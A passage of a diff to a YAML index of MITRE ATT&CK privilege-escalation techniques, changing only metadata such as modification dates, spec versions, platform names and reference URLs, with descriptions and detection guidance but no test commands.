         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -17644,12 +17976,11 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests: []
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -17752,7 +18083,6 @@ privilege-escalation:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests: []
   T1611:
@@ -17852,12 +18182,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1611
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -17870,7 +18199,6 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -17883,7 +18211,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -17913,7 +18240,8 @@ privilege-escalation:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests: []
   T1547.005:
@@ -17940,7 +18268,7 @@ privilege-escalation:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -17966,13 +18294,11 @@ privilege-escalation:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -18049,12 +18375,11 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -18073,6 +18398,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -18080,7 +18406,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -18100,34 +18425,36 @@ privilege-escalation:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -18163,6 +18490,10 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -18174,16 +18505,12 @@ privilege-escalation:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -18219,12 +18546,12 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -18232,14 +18559,13 @@ privilege-escalation:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -18254,6 +18580,7 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -18262,18 +18589,18 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -18305,9 +18632,6 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1547.003:
@@ -18379,7 +18703,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests: []
   T1546.005:
@@ -18406,7 +18729,7 @@ privilege-escalation:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -18432,13 +18755,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -18559,12 +18880,11 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -18596,11 +18916,10 @@ privilege-escalation:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -18641,11 +18960,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -18701,12 +19019,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests: []
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -18763,7 +19080,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests: []
   T1547.004:
@@ -18833,7 +19149,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests: []
   T1098.004:
@@ -18943,7 +19258,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests: []
   T1546.012:
@@ -18997,7 +19311,7 @@ privilege-escalation:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -19030,13 +19344,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests: []
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -19098,10 +19410,9 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -19159,7 +19470,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -19201,7 +19511,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -19260,8 +19570,6 @@ privilege-escalation:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.005:
     technique:
@@ -19291,7 +19599,7 @@ privilege-escalation:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -19326,12 +19634,10 @@ privilege-escalation:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -19408,7 +19714,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests: []
   T1055.004:
@@ -19447,7 +19752,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -19496,8 +19801,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests: []
   T1546.009:
@@ -19529,7 +19832,7 @@ privilege-escalation:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -19577,13 +19880,11 @@ privilege-escalation:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests: []
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -19596,16 +19897,16 @@ privilege-escalation:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -19617,16 +19918,16 @@ privilege-escalation:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -19681,7 +19982,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.002:
     technique:
@@ -19704,7 +20004,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -19748,8 +20048,6 @@ privilege-escalation:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests: []
   T1547.015:
@@ -19826,7 +20124,7 @@ privilege-escalation:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -19854,8 +20152,6 @@ privilege-escalation:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests: []
   T1134.001:
@@ -19914,23 +20210,22 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -19940,11 +20235,15 @@ privilege-escalation:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
